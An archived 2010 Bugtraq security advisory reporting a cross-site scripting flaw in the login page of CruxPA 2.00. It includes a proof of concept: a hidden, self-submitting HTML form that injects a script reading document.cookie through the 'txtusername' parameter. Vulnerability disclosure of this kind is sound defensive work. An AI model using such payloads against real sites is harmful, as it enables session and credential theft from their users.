lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Thu, 8 Jul 2010 16:29:35 +0200 (CEST)
From: advisory@...ridge.ch
To: bugtraq@...urityfocus.com
Subject: XSS vulnerability in CruxPA

Vulnerability ID: HTB22449
Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_cruxpa.html
Product: CruxPA
Vendor: CruxSoftware
Vulnerable Version: 2.00 and Probably Prior Versions
Vendor Notification: 21 June 2010 
Vulnerability Type: XSS (Cross Site Scripting)
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: Medium 
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/) 

Vulnerability Details:
User can execute arbitrary JavaScript code within the vulnerable application.

The vulnerability exists due to failure in the "/login.php" script to properly sanitize user-supplied input in "txtusername" POST parameter. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.

An attacker can use browser to exploit this vulnerability. The following PoC is available:


<form method="POST" action="http://host/login.php" name="main">
<input type=hidden name=txtusername value='"><script>alert(document.cookie)</script>'>
<input type=hidden name=txtpassword value=''>
<input type=hidden name=cmdSubmit value='Submit'>
</form>
<script>
document.main.submit();
</script>




Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ